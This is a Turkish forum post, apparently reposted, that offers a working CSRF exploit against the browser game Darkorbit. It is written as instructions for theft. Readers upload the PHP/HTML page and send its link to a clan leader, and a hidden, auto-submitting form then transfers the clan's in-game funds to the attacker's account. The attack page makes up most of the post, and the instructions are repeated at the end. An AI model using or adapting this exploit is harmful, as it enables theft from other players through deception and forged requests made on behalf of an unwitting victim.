Darkorbit te csrf açığı var arkadaşlar.Klandan istediğiniz kadar para çalabiliyorsunuz.
Bunu php olarak kaydedip bi siteye upload ediyosunuz sonra klan başkanına bu site linkini atıyorsunuz vename="payout" value="1300000"> klanda ne kadar para varsa value değerine yazın. Ben göndersem bana "1300000" gelir mesela.Bu kadar,böylece klandan para sömürebilirsiniz
KOLAY GELSİN...
ALINTIDIR.
Kod:
<?php
#############################################################
# Application Name : Darkorbit
# Vulnerable Type : CSRF
# Demo : http://us2.darkorbit.bigpoint.com/indexInternal.es
# Author : PF | Root
#############################################################
?>
*********
.a
{
display:none;
}
</style>
<body onload="********.getElementById('auszahlung').submit();return false;">
<div class="a">
<form name="auszahlung" id="auszahlung" action="http://tr3.darkorbit.bigpoint.com/indexInternal.es" method="post"><input type="hidden" name="reloadToken" value="18a67cf20e136865ea37f3ac3f4a1efb">
<input type="hidden" name="action" value="internalClan">
<input type="hidden" name="subAction" value="payoutClan">
<input type="hidden" name="tpl" value="internalClanAdministrate"> <input type="text" name="payout" value="1300000">
<select name="payoutUserID" class="clan-list fliess10px-black">
<option value="64608502">StifLer</option>
</select>
<input type="text" name="payoutDescription" value="Goliath Alimi">
<form>
</a>Bunu php olarak kaydedip bi siteye upload ediyosunuz sonra klan başkanına bu site linkini atıyorsunuz vename="payout" value="1300000"> klanda ne kadar para varsa value değerine yazın. Ben göndersem bana "1300000" gelir mesela.Bu kadar,böylece klandan para sömürebilirsiniz
KOLAY GELSİN...
ALINTIDIR.
